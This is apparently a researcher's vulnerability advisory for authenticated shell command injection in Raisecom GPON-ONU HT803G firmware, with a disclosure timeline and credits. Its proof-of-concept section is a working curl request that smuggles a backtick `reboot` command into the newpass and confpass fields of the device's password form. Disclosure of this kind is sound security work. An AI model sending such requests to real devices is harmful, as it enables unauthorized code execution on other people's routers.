Raisecom Technology GPON-ONU HT803G-07 Command Injection

`=====================================  
Authenticated Shell Command Injection  
=====================================  
  
. contents:: Table Of Content  
  
Overview  
========  
  
Title:- Authenticated Shell command Injection  
Author: Kaustubh G. Padwad  
  
Vendor: Raisecom technology co.,LTD  
Product: GPON-ONU HT803G-07 (could be more who shares the same codebase)  
  
Potentially vulnerable  
  
ISCOM HT803G-U  
ISCOM HT803G-W  
ISCOM HT803G-1GE  
ISCOM HT803G  
  
  
Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002  
Severity: High--Critical  
  
Advisory ID  
============  
KSA-Dev-006  
  
  
About the Product:  
==================  
  
The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform.  
  
  
Description:   
============  
An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with thefirmware version ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below, The values of the newpass and confpass parameters in /bin/WebMGR are used in a system call in the firmware. Because there is no user input validation, this leads to authenticated code execution on the device.  
  
[Additional_information]  
  
The value of newpass and confpass in /bin/WebMGR parameter is parse to system call in the Firmware and since their is no user input validation this leads to authenticated code execution on device  
  
Vulnerability Class:  
====================  
Authenticated Shell Command Injection  
  
  
Attack Type  
===========  
Local  
  
  
Impact Code execution  
=====================  
true  
  
  
Attack Vectors  
==============  
TO exploit this vulnerability one needs to parse the correct request to the device or they one needs to visit the crafted Page  
  
  
How to Reproduce: (POC):  
========================  
  
curl -i -s -k -X 'POST' \  
-H 'Origin: http://192.168.1.1' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \  
--data-binary $'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN' \  
'http://192.168.1.1/boaform/formPasswordSetup'  
  
Mitigation  
==========  
  
This issue is fixed in latest firmware as per vendor.  
  
Disclosure:   
===========  
28-NOV-2018 Discoverd the Vulnerability  
28-NOV-2018 Reported to vendor   
10-Dec-2018 Recived confirmation from vendor regarding fix  
05-JAN-2019 Request for the CVE-ID  
04-FEB-2019 CVE Assigned  
  
credits:  
========  
* Kaustubh Padwad  
* Information Security Researcher  
* [email protected]  
* https://s3curityb3ast.github.io/  
* https://twitter.com/s3curityb3ast  
* http://breakthesec.com  
* https://www.linkedin.com/in/kaustubhpadwad  
  
  
  
`